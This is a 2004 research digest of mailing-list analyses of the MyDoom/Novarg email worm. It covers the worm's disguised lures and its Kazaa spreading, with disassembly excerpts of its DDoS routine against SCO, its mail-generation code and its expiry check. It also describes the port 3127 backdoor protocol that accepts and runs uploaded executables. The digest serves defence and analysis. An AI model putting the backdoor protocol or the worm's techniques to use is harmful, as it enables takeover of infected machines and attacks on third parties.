Digest of parts of messages from the Trojan Horses Research Mailing List regarding the new mass mailer worm ---------------------------------- 27th of January, 2004 ------------------------------------------------------------------------ http://ecompute.org/th-list ======================================================================== Preface ------- This text comes to supplement different Anti Virus vendors web pages with more information on the analyzes of the new worm that hit yesterday. It was called different names by different AV companies which caused a lot of confusion, but was to be expected with a new fast-spreading worm in the wild. Our purpose in releasing this digest of email messages is to help the community of sysadmins and security researchers combat this worm. Some web pages to get information on: http://us.mcafee.com/virusInfo/default.asp?id=mydoom http://securityresponse.symantec.com/avcenter/venc/data/w32.novarg.a@mm.html http://www.f-secure.com/v-descs/novarg.shtml http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MIMAIL.R http://www3.ca.com/virusinfo/virus.aspx?ID=38102 NOTE (1): This is a compiled digest of information, it is served as-is. I didn't really have the time to invest in editing it and making it look good, formatted or organized. I hope you find it helpful. NOTE (2): All the below information and messages are forwarded from TH-Research with the permission of the original authors and the list manager as dictated by the list's FAQ. I guess we can call this "declassification". :o) NOTE (3): Thanks go to Daniel Otis Vigil from MooSoft Development (www.moosoft.com) for sharing the sample with the mailing list first. NOTE (4): Thanks are also due to the different members of TH-Research who helped with this new threat on the list and in our live joint "war room". There are many who are not quoted below. You can find a copy of this document at: http://www.math.org.il/newworm-digest1.txt. What is this mass-mailer worm? ------------------------------ This worm arrives in your Inbox as an attachment. The subject of the email changes, and the body contains one of the following lines: - "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment." - "The message contains Unicode characters and has been sent as a binary attachment." - "Mail transaction failed. Partial message is available." The attachment can be one of a few file types: EXE, PIF, CMD, SCR and very often as a ZIP archive. This worm is supposed to perform a DoS attack against www.sco.com and acts as a backdoor, listening on port 3127. The worm is built of an EXE and a DLL file, and it is packed with UPX. Spreading --------- The worm spreads via email and by copying itself to the Kazza shared folder on a victim's machine, if one exists. The worm is set to die on February 12th, 2004 The spreading speed of this worm was amazing. It hit the Internet hard and it hit it fast. MessageLabs (which obviously detected the worm heuristically – it's how their system works) show an incredible amount of emails, check out: http://www.messagelabs.com/viruseye/info/default.asp?frompage=introduction&fromurl=%2Fviruseye%2Fintro%2Fdefault%2Easp&virusname=W32%2FMyDoom%2EA%2Dmm ? Some more fun statistics at RAV: http://www.rav.ro/ravmsstats/ As reported by MessageLabs: ----- Currently we estimate we will hit 1,000,000/day, which is Sobig.F levels. Interesting that there was a 6 hour gap after we stopped our 1st copies. Perhaps these were seeds (haven't checked yet) Month Day Hour Count ----------- ----------- ----------- ----------- 1 26 13 2 ... 1 26 19 252 1 26 20 4292 1 26 21 27491 1 26 22 53203 1 26 23 54926 1 27 0 51668 1 27 1 51774 1 27 2 50311 1 27 3 50586 1 27 4 52700 ----- I believe we all know how serious this worm is (still is to a level), so let's skip to the next part. Is this a Mimail variant? ------------------------- Despite original assumptions, it turns out that the code has nothing in common with the MiMail strain. Some reverse engineering done on this worm: ------------------------------------------- Nicolas Brulez: ----- from my quick and dirty analysis, its a thread that does the DDOS. It has below normal priority, and it just does a GET. GET / HTTP/1.1\r\nHost: www.sco.com\r\n\r\n" That's about it i think. .text:004A6BB4 DDOS proc near ; CODE XREF: sub_4A6C3B+99 p .text:004A6BB4 ; DATA XREF: sub_4A6C3B+85 o .text:004A6BB4 .text:004A6BB4 String = byte ptr -210h .text:004A6BB4 var_10 = dword ptr -10h .text:004A6BB4 dwExitCode = dword ptr 8 .text:004A6BB4 .text:004A6BB4 push ebp .text:004A6BB5 mov ebp, esp .text:004A6BB7 sub esp, 210h .text:004A6BBD push esi .text:004A6BBE push edi .text:004A6BBF lea eax, [ebp+String] .text:004A6BC5 push offset GET ; "GET / HTTP/1.1\r\nHost: www.sco.com\r\n\r\n" .text:004A6BCA push eax .text:004A6BCB call decrypt .text:004A6BD0 pop ecx .text:004A6BD1 pop ecx .text:004A6BD2 push THREAD_PRIORITY_BELOW_NORMAL ; nPriority .text:004A6BD4 call ds:GetCurrentThread ; GetCurrentThread: .text:004A6BDA push eax ; hThread .text:004A6BDB call ds:SetThreadPriority ; SetThreadPriority: .text:004A6BE1 mov esi, [ebp+dwExitCode] .text:004A6BE4 test esi, esi .text:004A6BE6 jnz short loc_4A6BEF .text:004A6BE8 push esi ; dwExitCode .text:004A6BE9 call ds:ExitThread ; ExitThread: .text:004A6BEF .text:004A6BEF loc_4A6BEF: ; CODE XREF: DDOS+32 j .text:004A6BEF lea edi, [ebp+var_10] .text:004A6BF2 movsd .text:004A6BF3 movsd .text:004A6BF4 movsd .text:004A6BF5 movsd .text:004A6BF6 .text:004A6BF6 loc_4A6BF6: ; CODE XREF: DDOS+53 j .text:004A6BF6 ; DDOS+85 j .text:004A6BF6 lea eax, [ebp+var_10] .text:004A6BF9 push 8 .text:004A6BFB push eax .text:004A6BFC call sub_4A6A9F .text:004A6C01 mov esi, eax .text:004A6C03 pop ecx .text:004A6C04 test esi, esi .text:004A6C06 pop ecx .text:004A6C07 jz short loc_4A6BF6 .text:004A6C09 lea eax, [ebp+String] .text:004A6C0F push 0 .text:004A6C11 push eax ; lpString .text:004A6C12 call ds:lstrlenA ; lstrlenA: .text:004A6C18 push eax .text:004A6C19 lea eax, [ebp+String] .text:004A6C1F push eax .text:004A6C20 push esi .text:004A6C21 call ds:WS2_32_19 ; send .text:004A6C27 push 12Ch ; dwMilliseconds .text:004A6C2C call ds:Sleep ; Sleep: .text:004A6C32 push esi .text:004A6C33 call ds:WS2_32_3 ; closesocket .text:004A6C39 jmp short loc_4A6BF6 .text:004A6C39 DDOS endp .text:004A6C39 I might be wrong, but i didn't look more than a couple seconds. ----- The DLL as analyzed by Rolf Rolles: ----- A description of the DLL's functonality in MiMail.R: Listens on port 3127; accepts a maximum of 3 connections at a time. If the first byte of the recieved data is 0x85, the DLL skips the next byte, then compares the next dword read to 133C9EA2h; if this is true, it accepts the executable from the sender, downloads it to a temp file/directory and runs it. If the first byte of the recieved data is 4, we check for the following pattern: [0x4 0x1 PORT] [host address]. If host address doesn't "look good" then the address to resolve is passed as a string afterwards. "[" is sent when the port fowarding code gets an error; "Z" is sent if everything goes smoothly. ----- Slight correction/clarification: In the second paragraph, the second mention of 0x4 is distinct, ie the traffic looks like 0x4 |0x4 0x1 [port] [hostip]|. Also, when I said the DLL sends back a 'Z' or a '[' on fail/success respectively, this is actually inserted in the position of the 0x1 character and sends back the eight bytes indicated between the pipes above. Sorry for the confusion, Rolf ----- Some code snippets from Nicolas Brulez: ----- Here a few informations i gathered from the binary. no serious analysis at all. Just to have a "look and feel" : With the script, it takes no times to completely decode the entire. See below: .text:004A25C0 aVagreargtrgpba db 'InternetGetConnectedState',0 ; DATA XREF: sub_4A4681+44 o .text:004A25DA align 4 .text:004A25DC aJvavarg_qyy db 'wininet.dll',0 ; DATA XREF: sub_4A4681+A o .text:004A25E8 aAhxr2004 db 'nuke2004',0 ; DATA XREF: .text:004A11A8 o .text:004A25F1 align 4 .text:004A25F4 aBssvpr_penpx db 'office_crack',0 ; DATA XREF: .text:004A11A4 o .text:004A2601 align 4 .text:004A2604 aEbbgxvgkc db 'rootkitXP',0 ; DATA XREF: .text:004A11A0 o .text:004A260E align 4 .text:004A2610 aFgevcTvey2_0oq db 'strip-girl-2.0bdcom_patches',0 .text:004A2610 ; DATA XREF: .text:004A119C o .text:004A262C aNpgvingvba_pen db 'activation_crack',0 ; DATA XREF: .text:004A1198 o .text:004A263D align 4 .text:004A2640 aVpd2004Svany db 'icq2004-final',0 ; DATA XREF: .text:004A1194 o .text:004A264E align 4 .text:004A2650 aJvanzc5 db 'winamp5',0 .text:004A1194 dd offset aVpd2004Svany ; "icq2004-final" .text:004A1198 dd offset aNpgvingvba_pen ; "activation_crack" .text:004A119C dd offset aFgevcTvey2_0oq ; "strip-girl-2.0bdcom_patches" .text:004A11A0 dd offset aEbbgxvgkc ; "rootkitXP" .text:004A11A4 dd offset aBssvpr_penpx ; "office_crack" .text:004A11A8 dd offset aAhxr2004 ; "nuke2004" That's probably the names it uses for Kazaa speading. It also encodes the domain name below: .text:004A13F0 dd offset aZfa_pbz ; "msn.com" .text:004A13F4 dd offset aLnubb_pbz ; "yahoo.com" .text:004A13F8 dd offset aUbgznvy_pbz ; "hotmail.com" Prolly used for random mail generations. that will be used in the From field. The possible messages: .text:004A348C aMailTransactio db 'Mail transaction failed. Partial message is available.',0 .text:004A348C ; DATA XREF: sub_4A7255+42 o .text:004A34C3 align 8 .text:004A34C8 aTheMessageCont db 'The message contains Unicode characters and has been sent as' .text:004A34C8 ; DATA XREF: sub_4A7255+38 o .text:004A34C8 db ' a binary attachment.',0 .text:004A351A align 8 .text:004A3520 aTheMessageCann db 'The message cannot be represented in 7-bit ASCII encoding an' .text:004A3520 ; DATA XREF: sub_4A7255+2E o .text:004A3520 db 'd has been sent as a binary attachment.',0 Now about the headers which were encoded too: .text:004A35DC aKZfznvyCevbevg db 0Dh,0Ah ; DATA XREF: sub_4A74DD+100 o .text:004A35DC db 'X-MSMail-Priority: Normal',0 .text:004A35F8 aKCevbevgl3 db 0Dh,0Ah ; DATA XREF: sub_4A74DD+EE o .text:004A35F8 db 'X-Priority: 3',0 .text:004A3608 aBoundaryS db 9,'boundary="%s"',0 ; DATA XREF: sub_4A74DD+E0 o .text:004A3617 align 4 .text:004A3618 aPbagragGlcrZhy db 0Dh,0Ah ; DATA XREF: sub_4A74DD+CC o .text:004A3618 db 'Content-Type: multipart/mixed;',0Dh,0Ah,0 .text:004A363B align 4 .text:004A363C aZvzrIrefvba1_0 db 0Dh,0Ah ; DATA XREF: sub_4A74DD+BA o .text:004A363C db 'MIME-Version: 1.0',0 .text:004A3650 aQngr db 0Dh,0Ah ; DATA XREF: sub_4A74DD+99 o .text:004A3650 db 'Date: ',0 .text:004A3659 align 4 .text:004A365C aFhowrpg db 0Dh,0Ah ; DATA XREF: sub_4A74DD+7D o .text:004A365C db 'Subject: ',0 .text:004A3668 aGb db 0Dh,0Ah ; DATA XREF: sub_4A74DD+66 o .text:004A3668 db 'To: ',0 .text:004A366F align 4 .text:004A3670 aSebz db 'From: ',0 ; DATA XREF: sub_4A74DD+45 o .text:004A3677 align 4 .text:004A3678 ; u__::a_S(u__8,long long) .text:004A3678 a_S__3u__4u__8x db '----=_%s_%.3u_%.4u_%.8X.%.8X',0 .text:004A3678 ; DATA XREF: sub_4A74DD+39 o .text:004A3695 align 4 .text:004A3698 aNextpart db 'NextPart',0 ; DATA XREF: sub_4A74DD+34 o .text:004A36A1 align 4 .text:004A36A4 aS db 0Dh,0Ah ; DATA XREF: sub_4A75FD+C0 o .text:004A36A4 db 0Dh,0Ah .text:004A36A4 db '--%s--',0Dh,0Ah .text:004A36A4 db 0Dh,0Ah,0 .text:004A36B3 align 8 .text:004A36B8 aFPbagragGlcrNc db '--%s',0Dh,0Ah ; DATA XREF: sub_4A75FD+76 o .text:004A36B8 db 'Content-Type: application/octet-stream;',0Dh,0Ah .text:004A36B8 db 9,'name="%s"',0Dh,0Ah .text:004A36B8 db 'Content-Transfer-Encoding: base64',0Dh,0Ah .text:004A36B8 db 'Content-Disposition: attachment;',0Dh,0Ah .text:004A36B8 db 9,'filename="%s"',0Dh,0Ah text:004A3758 aFPbagragGlcrGr db '--%s',0Dh,0Ah ; DATA XREF: sub_4A75FD+31 o .text:004A3758 db 'Content-Type: text/plain;',0Dh,0Ah .text:004A3758 db 9,'charset="Windows-1252"',0Dh,0Ah .text:004A3758 db 'Content-Transfer-Encoding: 7bit',0Dh,0Ah .text:004A3758 db 0Dh,0Ah,0 .text:004A37B6 align 4 .text:004A37B8 aGuvfVfNZhygvCn db 'This is a multi-part message in MIME format.',0Dh,0Ah .text:004A37B8 ; DATA XREF: sub_4A75FD+1B o .text:004A37B8 db 0Dh,0Ah,0 .text:004A37E9 align 4 .text:004A37EC aQuit db 'QUIT',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+286 o .text:004A37F3 align 4 .text:004A37F4 a__0 db 0Dh,0Ah ; DATA XREF: sub_4A7B47+25F o .text:004A37F4 db '.',0Dh,0Ah,0 SMTP related: .text:004A37FC aData db 'DATA',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+1D9 o .text:004A3803 align 4 .text:004A3804 aEpcgGbF db 'RCPT TO:<%s>',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+1A3 o .text:004A3813 align 4 .text:004A3814 aZnvySebzF db 'MAIL FROM:<%s>',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+167 o .text:004A3825 align 4 .text:004A3828 aUrybF db 'HELO %s',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+12B o .text:004A3832 align 4 .text:004A3834 aRuybF db 'EHLO %s',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+F2 o .text:004A383E align 4 It also grab the SMTP server (strings were encoded): .text:004A7E0D push offset aFbsgjnerZvpe_2 ; "Software\\Microsoft\\Internet Account Man"... .text:004A7E12 push eax .text:004A7E13 call sub_4A465E .text:004A7E18 lea eax, [ebp+ValueName] .text:004A7E1E push offset aFzgcFreire ; "SMTP Server" .text:004A7E23 push eax .text:004A7E24 call sub_4A465E .text:004A7E29 add esp, 10h .text:004A7E2C lea eax, [ebp+hKey] .text:004A7E2F xor edi, edi .text:004A7E31 push eax ; phkResult .text:004A7E32 push 20019h ; samDesired .text:004A7E37 lea eax, [ebp+SubKey] .text:004A7E3D push edi ; ulOptions .text:004A7E3E push eax ; lpSubKey .text:004A7E3F push 80000001h ; hKey .text:004A7E44 call ds:RegOpenKeyExA ; RegOpenKeyExA: Nothing that isn't known by now though. I will do a complete analysis when time is on my side. ----- ----- Nicolas Brulez in reply to a message from a member I couldn't reach, to get his approval for forwarding his information and name. The email was about body text of the worm email messages as captured on his network: ----- .text:004A3334 dd offset aTest_0 ; "test" .text:004A333C dd offset aUv ; "hi" .text:004A3344 dd offset aUryyb ; "hello" .text:004A334C dd offset aZnvyQryvirelFlfgrz ; "Mail Delivery System" .text:004A3354 dd offset aZnvyGenafnpgvbaSnvyrq ; "Mail Transaction Failed" .text:004A335C dd offset aFreireErcbeg ; "Server Report" .text:004A3364 dd offset aFgnghf ; "Status" .text:004A336C dd offset aReebe ; "Error" .text:004A3374 dd offset dword_4A33E8 ; blank You see some variations in the Case because , the worm seems to use uppercase at times. Here is a code snipet: .text:004A6ED6 sub_4A6ED6 proc near ; CODE XREF: sub_4A76D2+60p .text:004A6ED6 push ebx .text:004A6ED7 push esi .text:004A6ED8 mov ebx, eax .text:004A6EDA call PRNG snip... some more Pseudo random number stuffs .text:004A6F39 .text:004A6F39 loc_4A6F39: ; CODE XREF: sub_4A6ED6+6Fj .text:004A6F39 movsx eax, al .text:004A6F3C add ecx, 8 .text:004A6F3F add esi, eax .text:004A6F41 mov al, [ecx] .text:004A6F43 test al, al .text:004A6F45 jnz short loc_4A6F39 .text:004A6F47 call PRNG .text:004A6F4C movzx eax, ax .text:004A6F4F cdq .text:004A6F50 idiv esi .text:004A6F52 xor esi, esi .text:004A6F54 xor eax, eax .text:004A6F56 inc esi .text:004A6F57 mov cl, 0Ch .text:004A6F59 .text:004A6F59 loc_4A6F59: ; CODE XREF: sub_4A6ED6+96j .text:004A6F59 movsx ecx, cl .text:004A6F5C add esi, ecx .text:004A6F5E cmp esi, edx .text:004A6F60 jge short loc_4A6F6E .text:004A6F62 mov cl, byte ptr ds:subjects[eax*8] ; Selection of the subject? .text:004A6F69 inc eax .text:004A6F6A test cl, cl .text:004A6F6C jnz short loc_4A6F59 .text:004A6F6E .text:004A6F6E loc_4A6F6E: ; CODE XREF: sub_4A6ED6+8Aj .text:004A6F6E cmp ds:byte_4A3328[eax*8], 0 .text:004A6F76 jnz short loc_4A6F7A .text:004A6F78 xor eax, eax .text:004A6F7A snip....... .text:004A6F8F .text:004A6F8F loc_4A6F8F: ; CODE XREF: sub_4A6ED6+57j .text:004A6F8F call PRNG .text:004A6F94 movzx eax, ax .text:004A6F97 push 64h .text:004A6F99 cdq .text:004A6F9A pop ecx .text:004A6F9B idiv ecx .text:004A6F9D cmp edx, 32h .text:004A6FA0 jl short loc_4A6FB8 .text:004A6FA2 cmp edx, 55h .text:004A6FA5 jge short loc_4A6FBD .text:004A6FA7 add ebx, 104h .text:004A6FAD push 1 ; cchLength .text:004A6FAF push ebx ; lpsz .text:004A6FB0 call ds:CharUpperBuffA ; CharUpperBuffA: .text:004A6FB6 jmp short loc_4A6FCA Uppercase the whole string. (hence your TEST) .text:004A6FB8 ; --------------------------------------------------------------------------- .text:004A6FB8 .text:004A6FB8 loc_4A6FB8: ; CODE XREF: sub_4A6ED6+CAj .text:004A6FB8 cmp edx, 55h .text:004A6FBB jl short loc_4A6FCA .text:004A6FBD .text:004A6FBD loc_4A6FBD: ; CODE XREF: sub_4A6ED6+CFj .text:004A6FBD add ebx, 104h .text:004A6FC3 push ebx ; lpsz .text:004A6FC4 call ds:CharUpperA ; CharUpperA: .text:004A6FCA Just one char, hence your "Hi, Test" etc.. ----- And more from Nicolas Brulez: ----- I think it has another possible message: .text:004A348C aMailTransactio db 'Mail transaction failed. Partial message is available.',0 .text:004A348C ; DATA XREF: sub_4A7255+42o .text:004A34C3 align 8 .text:004A34C8 aTheMessageCont db 'The message contains Unicode characters and has been sent as' .text:004A34C8 ; DATA XREF: sub_4A7255+38o .text:004A34C8 db ' a binary attachment.',0 .text:004A351A align 8 .text:004A3520 aTheMessageCann db 'The message cannot be represented in 7-bit ASCII encoding an' .text:004A3520 ; DATA XREF: sub_4A7255+2Eo .text:004A3520 db 'd has been sent as a binary attachment.',0 .text:004A3584 aTest db 'test',0 ; DATA XREF: sub_4A7255+24o I missed the test one. This comes from this piece of code: text:004A7272 mov [ebp+var_28], 5 .text:004A7279 mov [ebp+var_24], offset aTest ; "test" .text:004A7280 mov [ebp+var_20], ecx .text:004A7283 mov [ebp+var_1C], offset aTheMessageCann ; "The message cannot be represented in 7-"... .text:004A728A mov [ebp+var_18], ecx .text:004A728D mov [ebp+var_14], offset aTheMessageCont ; "The message contains Unicode characters"... .text:004A7294 mov [ebp+var_10], esi .text:004A7297 mov [ebp+var_C], offset aMailTransactio ; "Mail transaction failed. Partial messag"... .text:004A729E mov [ebp+var_4], eax .text:004A72A1 call PRNG .text:004A72A6 movzx eax, ax Here is the code that checks the expiration: .text:004A3D6E date_limite proc near ; CODE XREF: sub_4A3FB1+4Bp .text:004A3D6E .text:004A3D6E SystemTimeAsFileTime= _FILETIME ptr -10h .text:004A3D6E FileTime = _FILETIME ptr -8 .text:004A3D6E arg_0 = dword ptr 8 .text:004A3D6E .text:004A3D6E push ebp .text:004A3D6F mov ebp, esp .text:004A3D71 sub esp, 10h .text:004A3D74 lea eax, [ebp+SystemTimeAsFileTime] .text:004A3D77 push eax ; lpSystemTimeAsFileTime .text:004A3D78 call ds:GetSystemTimeAsFileTime ; GetSystemTimeAsFileTime: .text:004A3D7E lea eax, [ebp+FileTime] .text:004A3D81 push eax ; lpFileTime .text:004A3D82 mov eax, [ebp+arg_0] .text:004A3D85 add eax, 224h .text:004A3D8A push eax ; lpSystemTime .text:004A3D8B call ds:SystemTimeToFileTime ; SystemTimeToFileTime: .text:004A3D91 mov eax, [ebp+SystemTimeAsFileTime.dwHighDateTime] .text:004A3D94 cmp eax, [ebp+FileTime.dwHighDateTime] .text:004A3D97 jbe short not_12_february .text:004A3D99 xor eax, eax ; Worm expired. .text:004A3D9B inc eax .text:004A3D9C leave .text:004A3D9D retn .text:004A3D9E ; --------------------------------------------------------------------------- .text:004A3D9E .text:004A3D9E not_12_february: ; CODE XREF: date_limite+29j .text:004A3D9E jnb short loc_4A3DA4 .text:004A3DA0 xor eax, eax .text:004A3DA2 leave .text:004A3DA3 retn ----- D'Aloisio Marc observed some things about the DoS attack, and raised some preliminary questions: ----- Has anyone seen the DOS against SCO actually happen? I have the new critter in a test environment where we conducted a preliminary and rudimentary functionality and threat analysis and the only activity I can get it to perform related to www.sco.com is to resolve the name. In fact, it seems very unhappy if it cannot resolve www.sco.com. Once it can, it happily scans local files for anything that can be construed (very loosely) as a domain and tries to resolve mail servers based on these. In fact, right now it's trying to resolve 'mx.makewin.rsp'. "Makewin.rsp' is a file referenced in the help files of my DigitalMars C++ compiler on a test machine, so it's not a very smart worm. The worm also seems to like to increment the third octet of the host IP by one and syn to port 25 of that address over and over and over... I have played with the date, etc, but still no activity directed toward www.sco.com. It did die after 12 February, but gladly resurrected when the date was set back prior to that. I haven't had time to go through a code analysis - that will come later as time permits. ----- ----- Gadi Evron - ge@warp.mx.dk.